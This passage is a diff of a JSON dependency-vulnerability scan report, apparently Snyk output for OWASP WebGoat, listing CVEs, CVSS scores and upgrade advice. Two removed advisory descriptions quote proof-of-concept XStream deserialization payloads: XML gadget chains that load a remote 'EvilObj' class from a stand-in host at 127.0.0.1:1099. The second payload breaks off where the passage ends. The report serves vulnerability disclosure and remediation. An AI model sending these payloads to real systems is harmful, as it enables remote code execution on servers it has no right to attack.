-                  "version": "3.1.5"
+                  "version": "2025.4-SNAPSHOT"
                 },
                 {
-                  "name": "ch.qos.logback:logback-classic",
-                  "version": "1.4.11"
-                },
-                {
-                  "name": "ch.qos.logback:logback-core",
-                  "version": "1.4.11"
+                  "name": "com.thoughtworks.xstream:xstream",
+                  "version": "1.4.5"
                 }
               ],
               "source": "dependency_path"
             }
           ],
           "finding_type": "sca",
-          "key": "00000040-0000-4000-8000-000000000040",
+          "key": "00000000-0000-0000-0000-000000000017",
           "locations": [
             {
               "package": {
-                "name": "ch.qos.logback:logback-core",
-                "version": "1.4.11"
+                "name": "com.thoughtworks.xstream:xstream",
+                "version": "1.4.5"
               },
               "type": "package"
             }
           ],
           "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "medium"
-          },
-          "risk": {},
-          "title": "Dual license: EPL-1.0, LGPL-2.1"
-        },
-        "id": "00000040-0000-4000-8000-000000000040",
-        "links": {},
-        "relationships": {},
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
-          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\r\n\r\n### PoC\r\n\r\n```\r\n\u003csorted-set\u003e\r\n  \u003cjavax.naming.ldap.Rdn_-RdnEntry\u003e\r\n    \u003ctype\u003eysomap\u003c/type\u003e\r\n    \u003cvalue class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'\u003e\r\n      \u003cmessage class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'\u003e\r\n        \u003cparsedMessage\u003etrue\u003c/parsedMessage\u003e\r\n        \u003csoapVersion\u003eSOAP_11\u003c/soapVersion\u003e\r\n        \u003cbodyParts/\u003e\r\n        \u003csm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'\u003e\r\n          \u003cattachmentsInitialized\u003efalse\u003c/attachmentsInitialized\u003e\r\n          \u003cmultiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'\u003e\r\n            \u003csoapPart/\u003e\r\n            \u003cmm\u003e\r\n              \u003cit class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'\u003e\r\n                \u003caliases class='com.sun.jndi.toolkit.dir.ContextEnumerator'\u003e\r\n                  \u003cchildren class='javax.naming.directory.BasicAttribute$ValuesEnumImpl'\u003e\r\n                    \u003clist class='com.sun.xml.internal.dtdparser.SimpleHashtable'\u003e\r\n                      \u003ccurrent\u003e\r\n                        \u003chash\u003e1\u003c/hash\u003e\r\n                        \u003ckey class='javax.naming.Binding'\u003e\r\n                          \u003cname\u003eysomap\u003c/name\u003e\r\n                          \u003cisRel\u003efalse\u003c/isRel\u003e\r\n                            \u003cboundObj class='com.sun.jndi.ldap.LdapReferralContext'\u003e\r\n                              \u003crefCtx class='javax.naming.spi.ContinuationDirContext'\u003e\r\n                                \u003ccpe\u003e\r\n                                  \u003cstackTrace/\u003e\r\n                                  \u003csuppressedExceptions class='java.util.Collections$UnmodifiableRandomAccessList' resolves-to='java.util.Collections$UnmodifiableList'\u003e\r\n                                    \u003cc class='list'/\u003e\r\n                                    \u003clist reference='../c'/\u003e\r\n                                  \u003c/suppressedExceptions\u003e\r\n                                  \u003cresolvedObj class='javax.naming.Reference'\u003e\r\n                                    \u003cclassName\u003eEvilObj\u003c/className\u003e\r\n                                    \u003caddrs/\u003e\r\n                                    \u003cclassFactory\u003eEvilObj\u003c/classFactory\u003e\r\n                                    \u003cclassFactoryLocation\u003ehttp://127.0.0.1:1099/\u003c/classFactoryLocation\u003e\r\n                                  \u003c/resolvedObj\u003e\r\n                                  \u003caltName class='javax.naming.CompoundName' serialization='custom'\u003e\r\n                                    \u003cjavax.naming.CompoundName\u003e\r\n                                      \u003cproperties/\u003e\r\n                                      \u003cint\u003e1\u003c/int\u003e\r\n                                      \u003cstring\u003eysomap\u003c/string\u003e\r\n                                    \u003c/javax.naming.CompoundName\u003e\r\n                                  \u003c/altName\u003e\r\n                                \u003c/cpe\u003e\r\n                              \u003c/refCtx\u003e\r\n                              \u003cskipThisReferral\u003efalse\u003c/skipThisReferral\u003e\r\n                              \u003chopCount\u003e0\u003c/hopCount\u003e\r\n                            \u003c/boundObj\u003e\r\n                        \u003c/key\u003e\r\n                      \u003c/current\u003e\r\n                      \u003ccurrentBucket\u003e0\u003c/currentBucket\u003e\r\n                      \u003ccount\u003e0\u003c/count\u003e\r\n                      \u003cthreshold\u003e0\u003c/threshold\u003e\r\n                    \u003c/list\u003e\r\n                  \u003c/children\u003e\r\n                  \u003ccurrentReturned\u003etrue\u003c/currentReturned\u003e\r\n                  \u003ccurrentChildExpanded\u003efalse\u003c/currentChildExpanded\u003e\r\n                  \u003crootProcessed\u003etrue\u003c/rootProcessed\u003e\r\n                  \u003cscope\u003e2\u003c/scope\u003e\r\n                \u003c/aliases\u003e\r\n              \u003c/it\u003e\r\n            \u003c/mm\u003e\r\n          \u003c/multiPart\u003e\r\n        \u003c/sm\u003e\r\n      \u003c/message\u003e\r\n    \u003c/value\u003e\r\n  \u003c/javax.naming.ldap.Rdn_-RdnEntry\u003e\r\n  \u003cjavax.naming.ldap.Rdn_-RdnEntry\u003e\r\n    \u003ctype\u003eysomap\u003c/type\u003e\r\n    \u003cvalue class='com.sun.org.apache.xpath.internal.objects.XString'\u003e\r\n      \u003cm__obj class='string'\u003etest\u003c/m__obj\u003e\r\n    \u003c/value\u003e\r\n  \u003c/javax.naming.ldap.Rdn_-RdnEntry\u003e\r\n\u003c/sorted-set\u003e\r\n```\r\n\r\n```\r\nXStream xstream = new XStream();\r\nxstream.fromXML(xml);\r\n```\n## Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.18 or higher.\n## References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-39148.html)\n- [XStream Changelog](https://x-stream.github.io/changes.html#1.4.18)\n",
-          "evidence": [
-            {
-              "path": [
+          "problems": [
+            { "id": "GHSA-hvv8-336g-rx3m", "source": "ghsa" },
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[,1.4.16)"],
+              "created_at": "2021-03-23T13:10:40.084443Z",
+              "credits": ["Liaogui Zhong"],
+              "cvss_base_score": 5.3,
+              "cvss_sources": [
+                {
+                  "assigner": "Snyk",
+                  "base_score": 5.3,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-06T13:59:49.121964Z",
+                  "severity": "medium",
+                  "type": "primary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N/E:P"
+                },
+                {
+                  "assigner": "NVD",
+                  "base_score": 9.1,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:48:16.9125Z",
+                  "severity": "critical",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
+                },
+                {
+                  "assigner": "Red Hat",
+                  "base_score": 7.4,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:53:53.281918Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"
+                },
+                {
+                  "assigner": "SUSE",
+                  "base_score": 7.4,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:49:10.727302Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"
+                }
+              ],
+              "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N/E:P",
+              "disclosed_at": "2021-03-23T13:07:59Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "epss_details": {
+                "model_version": "v2025.03.14",
+                "percentile": "0.76538",
+                "probability": "0.01022"
+              },
+              "exploit_details": {
+                "maturity_levels": [
+                  {
+                    "format": "CVSSv3",
+                    "level": "proof of concept",
+                    "type": "secondary"
+                  },
+                  {
+                    "format": "CVSSv4",
+                    "level": "proof of concept",
+                    "type": "primary"
+                  }
+                ],
+                "sources": ["Snyk"]
+              },
+              "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088338",
+              "initially_fixed_in_versions": ["1.4.16"],
+              "is_fixable": true,
+              "is_malicious": false,
+              "is_social_media_trending": false,
+              "modified_at": "2024-03-11T09:53:53.281918Z",
+              "package_name": "com.thoughtworks.xstream:xstream",
+              "package_version": "",
+              "published_at": "2021-03-23T17:13:23.58779Z",
+              "references": [
                 {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
+                  "title": "XStream Advisory",
+                  "url": "https://x-stream.github.io/CVE-2021-21342.html"
                 },
                 {
-                  "name": "com.thoughtworks.xstream:xstream",
-                  "version": "1.4.5"
+                  "title": "XStream Changelog",
+                  "url": "http://x-stream.github.io/changes.html%231.4.16"
+                },
+                {
+                  "title": "XStream Workaround",
+                  "url": "https://x-stream.github.io/security.html%23workaround"
                 }
               ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "00000041-0000-4000-8000-000000000041",
-          "locations": [
-            {
-              "package": {
-                "name": "com.thoughtworks.xstream:xstream",
-                "version": "1.4.5"
-              },
-              "type": "package"
-            }
+              "severity": "medium",
+              "source": "snyk_vuln"
+            },
+            { "id": "CWE-502", "source": "cwe" },
+            { "id": "CVE-2021-21342", "source": "cve" }
           ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 275
-            }
-          },
-          "title": "Arbitrary Code Execution"
+          "rating": { "severity": "medium" },
+          "risk": { "risk_score": { "value": 142 } },
+          "title": "Deserialization of Untrusted Data"
         },
-        "id": "00000041-0000-4000-8000-000000000041",
+        "id": "00000000-0000-0000-0000-000000000017",
         "links": {},
         "relationships": {
           "fix": {
@@ -14903,11 +2960,11 @@
                       "dependency_path": [
                         {
                           "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
+                          "version": "2025.4-SNAPSHOT"
                         },
                         {
                           "name": "com.thoughtworks.xstream:xstream",
-                          "version": "1.4.18"
+                          "version": "1.4.16"
                         }
                       ],
                       "is_drop": false
@@ -14916,7 +2973,7 @@
                 },
                 "outcome": "fully_resolved"
               },
-              "id": "00000041-0000-4000-8000-000000000041",
+              "id": "00000000-0000-0000-0000-000000000017",
               "type": "fixes"
             }
           }
@@ -14926,54 +2983,138 @@
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "## Overview\n[org.springframework.security:spring-security-crypto](https://mvnrepository.com/artifact/org.springframework.security/spring-security-crypto) is a spring-security-crypto library for Spring Security.\n\nAffected versions of this package are vulnerable to Authentication Bypass by Primary Weakness in the `BCryptPasswordEncoder.matches()` function, which only takes the first 72 characters for comparison. Passwords longer than this will incorrectly return true when compared against other strings sharing the same first 72 characters, making them easier to brute force. \r\n\r\n**Note:** Patches have also been issued for older versions of Enterprise Support packages.\n## Remediation\nUpgrade `org.springframework.security:spring-security-crypto` to version 6.3.8, 6.4.4 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-security/commit/46f0dc6dfc8402cd556c598fdf2d31f9d46cdbf3)\n- [Vulnerability Advisory](https://spring.io/security/cve-2025-22228)\n",
+          "description": "## Overview\n\nAffected versions of this package are vulnerable to Uncontrolled Recursion via the `ClassUtils.getClass` function. An attacker can cause the application to terminate unexpectedly by providing excessively long input values.\n## Remediation\nUpgrade `org.apache.commons:commons-lang3` to version 3.18.0 or higher.\n## References\n- [Apache Pony Mail](https://lists.apache.org/thread/bgv0lpswokgol11tloxnjfzdl7yrc1g1)\n- [GitHub Commit](https://github.com/apache/commons-lang/commit/b424803abdb2bec818e4fbcb251ce031c22aca53)\n",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
+                  "version": "2025.4-SNAPSHOT"
                 },
                 {
-                  "name": "org.springframework.boot:spring-boot-starter-oauth2-client",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "org.springframework.security:spring-security-core",
-                  "version": "6.1.5"
-                },
-                {
-                  "name": "org.springframework.security:spring-security-crypto",
-                  "version": "6.1.5"
+                  "name": "org.apache.commons:commons-lang3",
+                  "version": "3.14.0"
                 }
               ],
               "source": "dependency_path"
             }
           ],
           "finding_type": "sca",
-          "key": "00000042-0000-4000-8000-000000000042",
+          "key": "00000000-0000-0000-0000-000000000018",
           "locations": [
             {
               "package": {
-                "name": "org.springframework.security:spring-security-crypto",
-                "version": "6.1.5"
+                "name": "org.apache.commons:commons-lang3",
+                "version": "3.14.0"
               },
               "type": "package"
             }
           ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "critical"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 139
-            }
-          },
-          "title": "Authentication Bypass by Primary Weakness"
+          "policy_modifications": [],
+          "problems": [
+            { "id": "CWE-674", "source": "cwe" },
+            { "id": "CVE-2025-48924", "source": "cve" },
+            { "id": "GHSA-j288-q9x7-2f5v", "source": "ghsa" },
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[3.0, 3.18.0)"],
+              "created_at": "2025-07-13T07:58:53.086065Z",
+              "credits": ["Unknown"],
+              "cvss_base_score": 8.8,
+              "cvss_sources": [
+                {
+                  "assigner": "Snyk",
+                  "base_score": 8.8,
+                  "cvss_version": "4.0",
+                  "modified_at": "2025-07-13T09:08:38.850906Z",
+                  "severity": "high",
+                  "type": "primary",
+                  "vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N"
+                },
+                {
+                  "assigner": "Snyk",
+                  "base_score": 8.2,
+                  "cvss_version": "3.1",
+                  "modified_at": "2025-07-13T09:08:38.850906Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H"
+                },
+                {
+                  "assigner": "Red Hat",
+                  "base_score": 3.7,
+                  "cvss_version": "3.1",
+                  "modified_at": "2025-07-12T06:33:52.830274Z",
+                  "severity": "low",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
+                },
+                {
+                  "assigner": "SUSE",
+                  "base_score": 4.7,
+                  "cvss_version": "3.1",
+                  "modified_at": "2025-08-14T11:02:13.905724Z",
+                  "severity": "medium",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H"
+                }
+              ],
+              "cvss_vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N",
+              "disclosed_at": "2025-07-11T15:31:37Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "epss_details": {
+                "model_version": "v2025.03.14",
+                "percentile": "0.21606",
+                "probability": "0.00070"
+              },
+              "exploit_details": {
+                "maturity_levels": [
+                  {
+                    "format": "CVSSv3",
+                    "level": "not defined",
+                    "type": "secondary"
+                  },
+                  {
+                    "format": "CVSSv4",
+                    "level": "not defined",
+                    "type": "primary"
+                  }
+                ],
+                "sources": []
+              },
+              "id": "SNYK-JAVA-ORGAPACHECOMMONS-10734078",
+              "initially_fixed_in_versions": ["3.18.0"],
+              "is_fixable": true,
+              "is_malicious": false,
+              "is_social_media_trending": false,
+              "modified_at": "2025-08-14T11:02:13.905724Z",
+              "package_name": "org.apache.commons:commons-lang3",
+              "package_version": "",
+              "published_at": "2025-07-13T09:08:38.832136Z",
+              "references": [
+                {
+                  "title": "Apache Pony Mail",
+                  "url": "https://lists.apache.org/thread/bgv0lpswokgol11tloxnjfzdl7yrc1g1"
+                },
+                {
+                  "title": "GitHub Commit",
+                  "url": "https://github.com/apache/commons-lang/commit/b424803abdb2bec818e4fbcb251ce031c22aca53"
+                }
+              ],
+              "severity": "high",
+              "source": "snyk_vuln"
+            }
+          ],
+          "rating": { "severity": "high" },
+          "risk": { "risk_score": { "value": 172 } },
+          "title": "Uncontrolled Recursion"
         },
-        "id": "00000042-0000-4000-8000-000000000042",
+        "id": "00000000-0000-0000-0000-000000000018",
         "links": {},
         "relationships": {
           "fix": {
@@ -14981,25 +3122,17 @@
               "attributes": {
                 "action": {
                   "format": "upgrade_package_advice",
-                  "package_name": "org.springframework.security:spring-security-crypto",
+                  "package_name": "org.apache.commons:commons-lang3",
                   "upgrade_paths": [
                     {
                       "dependency_path": [
                         {
                           "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-oauth2-client",
-                          "version": "3.3.10"
+                          "version": "2025.4-SNAPSHOT"
                         },
                         {
-                          "name": "org.springframework.security:spring-security-core",
-                          "version": "6.3.8"
-                        },
-                        {
-                          "name": "org.springframework.security:spring-security-crypto",
-                          "version": "6.3.8"
+                          "name": "org.apache.commons:commons-lang3",
+                          "version": "3.18.0"
                         }
                       ],
                       "is_drop": false
@@ -15008,7 +3141,7 @@
                 },
                 "outcome": "fully_resolved"
               },
-              "id": "00000042-0000-4000-8000-000000000042",
+              "id": "00000000-0000-0000-0000-000000000018",
               "type": "fixes"
             }
           }
@@ -15018,107 +3151,107 @@
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "## Overview\n[ch.qos.logback:logback-core](https://mvnrepository.com/artifact/ch.qos.logback/logback-core) is a logback-core module.\n\nAffected versions of this package are vulnerable to Server-side Request Forgery (SSRF) through the `SaxEventRecorder` process. An attacker can forge requests by compromising logback configuration files in XML.\n## Remediation\nUpgrade `ch.qos.logback:logback-core` to version 1.3.15, 1.5.13 or higher.\n## References\n- [Additional Information](https://logback.qos.ch/news.html#1.5.13)\n- [GitHub Commit](https://github.com/qos-ch/logback/commit/2863a4974a3649b5b00d4a529ee6ff2063470f35)\n- [GitHub Commit](https://github.com/qos-ch/logback/commit/5f05041cba4c4ac0a62748c5c527a2da48999f2d)\n- [Release Notes](https://logback.qos.ch/news.html#1.3.15)\n",
+          "description": "LGPL-2.1 license",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-validation",
-                  "version": "3.1.5"
+                  "version": "2025.4-SNAPSHOT"
                 },
                 {
-                  "name": "org.springframework.boot:spring-boot-starter",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-logging",
-                  "version": "3.1.5"
+                  "name": "org.springframework.boot:spring-boot-starter-data-jpa",
+                  "version": "3.5.6"
                 },
                 {
-                  "name": "ch.qos.logback:logback-classic",
-                  "version": "1.4.11"
+                  "name": "org.hibernate.orm:hibernate-core",
+                  "version": "6.6.29.Final"
                 },
                 {
-                  "name": "ch.qos.logback:logback-core",
-                  "version": "1.4.11"
+                  "name": "org.hibernate.common:hibernate-commons-annotations",
+                  "version": "7.0.3.Final"
                 }
               ],
               "source": "dependency_path"
             }
           ],
           "finding_type": "sca",
-          "key": "00000043-0000-4000-8000-000000000043",
+          "key": "00000000-0000-0000-0000-000000000019",
           "locations": [
             {
               "package": {
-                "name": "ch.qos.logback:logback-core",
-                "version": "1.4.11"
+                "name": "org.hibernate.common:hibernate-commons-annotations",
+                "version": "7.0.3.Final"
               },
               "type": "package"
             }
           ],
           "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "low"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 53
-            }
+          "problems": [
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[4.0.0.CR1,)"],
+              "created_at": "2025-03-09T20:04:52.151Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "id": "snyk:lic:maven:org.hibernate.common:hibernate-commons-annotations:LGPL-2.1",
+              "instructions": [],
+              "license": "LGPL-2.1",
+              "package_name": "org.hibernate.common:hibernate-commons-annotations",
+              "package_version": "",
+              "published_at": "2025-03-09T20:04:52.151Z",
+              "severity": "medium",
+              "source": "snyk_license"
+            }
+          ],
+          "rating": { "severity": "medium" },
+          "risk": {},
+          "suppression": {
+            "created_at": "2025-11-19T13:58:43.236Z",
+            "justification": "License issue",
+            "path": ["*"],
+            "policy": { "id": "17953be9-f7ac-46bd-9b06-6dd09cf8f3d2" },
+            "status": "ignored"
           },
-          "title": "Server-side Request Forgery (SSRF)"
+          "title": "LGPL-2.1 license"
         },
-        "id": "00000043-0000-4000-8000-000000000043",
+        "id": "00000000-0000-0000-0000-000000000019",
         "links": {},
         "relationships": {
-          "fix": {
+          "policy": {
             "data": {
               "attributes": {
-                "action": {
-                  "format": "upgrade_package_advice",
-                  "package_name": "ch.qos.logback:logback-core",
-                  "upgrade_paths": [
-                    {
-                      "dependency_path": [
-                        {
-                          "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-validation",
-                          "version": "3.3.8"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter",
-                          "version": "3.3.8"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-logging",
-                          "version": "3.3.8"
-                        },
-                        {
-                          "name": "ch.qos.logback:logback-classic",
-                          "version": "1.5.16"
+                "policies": [
+                  {
+                    "applied_policy": {
+                      "action_type": "ignore",
+                      "ignore": {
+                        "created": "2025-11-19T13:58:43.236Z",
+                        "disregard_if_fixable": false,
+                        "ignored_by": {
+                          "email": "catalin.iuga@snyk.io",
+                          "id": "41f56271-2447-4a42-9708-7bbeec29acd0",
+                          "name": "Catalin"
                         },
-                        {
-                          "name": "ch.qos.logback:logback-core",
-                          "version": "1.5.16"
-                        }
-                      ],
-                      "is_drop": false
-                    }
-                  ]
-                },
-                "outcome": "fully_resolved"
+                        "path": ["*"],
+                        "reason": "License issue",
+                        "reason_type": "not-vulnerable",
+                        "source": "api"
+                      }
+                    },
+                    "id": "17953be9-f7ac-46bd-9b06-6dd09cf8f3d2",
+                    "type": "legacy_policy_snapshot"
+                  }
+                ]
               },
-              "id": "00000043-0000-4000-8000-000000000043",
-              "type": "fixes"
-            }
+              "id": "dfb09561-e252-4f4a-8816-023e4bb2d79a",
+              "type": "policies"
+            },
+            "links": {}
           }
         },
         "type": "findings"
@@ -15126,54 +3259,138 @@
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "## Overview\n[org.jboss.xnio:xnio-api](https://mvnrepository.com/artifact/org.jboss.xnio/xnio-api) is a simplified low-level I/O layer which can be used anywhere you are using NIO.\n\nAffected versions of this package are vulnerable to Uncontrolled Resource Consumption ('Resource Exhaustion') due to the `NotifierState` function that can cause a Stack Overflow Exception when the chain of notifier states becomes problematically large, leading to a possible denial of service.\n## Remediation\nUpgrade `org.jboss.xnio:xnio-api` to version 3.5.10, 3.7.13, 3.8.14 or higher.\n## References\n- [GitHub Commit](https://github.com/xnio/xnio/commit/ffabdcdda508ef87aeadad5ca3f854e274d60ec1)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2241822)\n",
+          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\r\n\r\n### PoC\r\n\r\n```\r\n\u003csorted-set\u003e\r\n  \u003cjavax.naming.ldap.Rdn_-RdnEntry\u003e\r\n    \u003ctype\u003eysomap\u003c/type\u003e\r\n    \u003cvalue class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'\u003e\r\n      \u003cmessage class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'\u003e\r\n        \u003cparsedMessage\u003etrue\u003c/parsedMessage\u003e\r\n        \u003csoapVersion\u003eSOAP_11\u003c/soapVersion\u003e\r\n        \u003cbodyParts/\u003e\r\n        \u003csm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'\u003e\r\n          \u003cattachmentsInitialized\u003efalse\u003c/attachmentsInitialized\u003e\r\n          \u003cmultiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'\u003e\r\n            \u003csoapPart/\u003e\r\n            \u003cmm\u003e\r\n              \u003cit class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'\u003e\r\n                \u003caliases class='com.sun.jndi.ldap.LdapSearchEnumeration'\u003e\r\n                  \u003clistArg class='javax.naming.CompoundName' serialization='custom'\u003e\r\n                    \u003cjavax.naming.CompoundName\u003e\r\n                      \u003cproperties/\u003e\r\n                      \u003cint\u003e1\u003c/int\u003e\r\n                      \u003cstring\u003eysomap\u003c/string\u003e\r\n                    \u003c/javax.naming.CompoundName\u003e\r\n                  \u003c/listArg\u003e\r\n                  \u003ccleaned\u003efalse\u003c/cleaned\u003e\r\n                  \u003cres\u003e\r\n                    \u003cmsgId\u003e0\u003c/msgId\u003e\r\n                    \u003cstatus\u003e0\u003c/status\u003e\r\n                  \u003c/res\u003e\r\n                  \u003cenumClnt\u003e\r\n                    \u003cisLdapv3\u003efalse\u003c/isLdapv3\u003e\r\n                    \u003creferenceCount\u003e0\u003c/referenceCount\u003e\r\n                    \u003cpooled\u003efalse\u003c/pooled\u003e\r\n                    \u003cauthenticateCalled\u003efalse\u003c/authenticateCalled\u003e\r\n                  \u003c/enumClnt\u003e\r\n                  \u003climit\u003e1\u003c/limit\u003e\r\n                  \u003cposn\u003e0\u003c/posn\u003e\r\n                  \u003chomeCtx\u003e\r\n                    \u003c__contextType\u003e0\u003c/__contextType\u003e\r\n                    \u003cport__number\u003e1099\u003c/port__number\u003e\r\n                    \u003chostname\u003e127.0.0.1\u003c/hostname\u003e\r\n                    \u003cclnt reference='../../enumClnt'/\u003e\r\n                    \u003chandleReferrals\u003e0\u003c/handleReferrals\u003e\r\n                    \u003chasLdapsScheme\u003etrue\u003c/hasLdapsScheme\u003e\r\n                    \u003cnetscapeSchemaBug\u003efalse\u003c/netscapeSchemaBug\u003e\r\n                    \u003creferralHopLimit\u003e0\u003c/referralHopLimit\u003e\r\n                    \u003cbatchSize\u003e0\u003c/batchSize\u003e\r\n                    \u003cdeleteRDN\u003efalse\u003c/deleteRDN\u003e\r\n                    \u003ctypesOnly\u003efalse\u003c/typesOnly\u003e\r\n                    \u003cderefAliases\u003e0\u003c/derefAliases\u003e\r\n                    \u003caddrEncodingSeparator/\u003e\r\n                    \u003cconnectTimeout\u003e0\u003c/connectTimeout\u003e\r\n                    \u003creadTimeout\u003e0\u003c/readTimeout\u003e\r\n                    \u003cwaitForReply\u003efalse\u003c/waitForReply\u003e\r\n                    \u003creplyQueueSize\u003e0\u003c/replyQueueSize\u003e\r\n                    \u003cuseSsl\u003efalse\u003c/useSsl\u003e\r\n                    \u003cuseDefaultPortNumber\u003efalse\u003c/useDefaultPortNumber\u003e\r\n                    \u003cparentIsLdapCtx\u003efalse\u003c/parentIsLdapCtx\u003e\r\n                    \u003chopCount\u003e0\u003c/hopCount\u003e\r\n                    \u003cunsolicited\u003efalse\u003c/unsolicited\u003e\r\n                    \u003csharable\u003efalse\u003c/sharable\u003e\r\n                    \u003cenumCount\u003e1\u003c/enumCount\u003e\r\n                    \u003ccloseRequested\u003efalse\u003c/closeRequested\u003e\r\n                  \u003c/homeCtx\u003e\r\n                  \u003cmore\u003etrue\u003c/more\u003e\r\n                  \u003chasMoreCalled\u003etrue\u003c/hasMoreCalled\u003e\r\n                  \u003cstartName class='javax.naming.ldap.LdapName' serialization='custom'\u003e\r\n                    \u003cjavax.naming.ldap.LdapName\u003e\r\n                      \u003cdefault/\u003e\r\n                      \u003cstring\u003euid=ysomap,ou=oa,dc=example,dc=com\u003c/string\u003e\r\n                    \u003c/javax.naming.ldap.LdapName\u003e\r\n                  \u003c/startName\u003e\r\n                  \u003csearchArgs\u003e\r\n                    \u003cname class='javax.naming.CompoundName' reference='../../listArg'/\u003e\r\n                    \u003cfilter\u003eysomap\u003c/filter\u003e\r\n                    \u003ccons\u003e\r\n                      \u003csearchScope\u003e1\u003c/searchScope\u003e\r\n                      \u003ctimeLimit\u003e0\u003c/timeLimit\u003e\r\n                      \u003cderefLink\u003efalse\u003c/derefLink\u003e\r\n                      \u003creturnObj\u003etrue\u003c/returnObj\u003e\r\n                      \u003ccountLimit\u003e0\u003c/countLimit\u003e\r\n                    \u003c/cons\u003e\r\n                    \u003creqAttrs/\u003e\r\n                  \u003c/searchArgs\u003e\r\n                  \u003centries\u003e\r\n                    \u003ccom.sun.jndi.ldap.LdapEntry\u003e\r\n                      \u003cDN\u003euid=songtao.xu,ou=oa,dc=example,dc=com\u003c/DN\u003e\r\n                      \u003cattributes 